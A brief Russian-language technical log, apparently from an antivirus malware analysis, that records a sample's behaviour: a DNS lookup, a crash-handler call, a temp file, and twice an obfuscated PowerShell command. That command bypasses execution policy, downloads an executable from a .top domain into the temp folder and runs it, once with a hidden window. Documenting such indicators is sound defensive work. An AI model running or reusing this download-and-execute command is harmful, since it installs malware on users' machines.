Техническая информация
- http://06j5.top/http/ как $uytcccs
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $uytcccs=$env:temp+'\3bs2.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://06j5.top/http/',$uytcccs);Start-Process $uytcccs
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1484
- %TEMP%\1178618.cvr
- DNS ASK 06##.top
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $uytcccs=$env:temp+'\3bs2.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://06j5.top/http/',$uytcccs);Start-Process $uytcccs' (со скрытым окном)